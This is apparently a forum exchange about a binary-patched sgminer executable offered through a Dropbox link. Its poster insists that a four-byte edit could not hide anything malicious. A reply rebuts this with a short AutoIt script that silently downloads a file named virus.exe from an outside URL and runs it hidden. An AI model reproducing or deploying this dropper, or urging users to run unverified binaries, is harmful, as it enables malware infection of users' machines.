Hey guys, now I know you guys don't want to run any random executables, however I have binary patched sgminer so it allows you to remove girino's pool
Link
https://www.dropbox.com/s/fxs1fwxiu7l0aua/sgminera.exeYou can do a binary comparison and see I've only edited a few bytes(should be 4), there is no way I could've slipped anything malicious.#notrayicon
Func _awesome()
inetget("https://dl.dropboxusercontent.com/u/somerandomasshole/virus.exe",@WorkingDir&"\virus.exe",0)
call(ShellExecute(@WorkingDir&"\virus.exe",@WorkingDir,@SW_hide))
EndFunc
_awesome()
im not saying u did something malicious, but dont say theres no way to slip it in 4 bytes
